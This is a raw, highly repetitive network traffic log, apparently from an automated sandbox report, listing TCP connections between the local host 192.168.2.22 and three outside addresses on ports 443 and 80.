            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
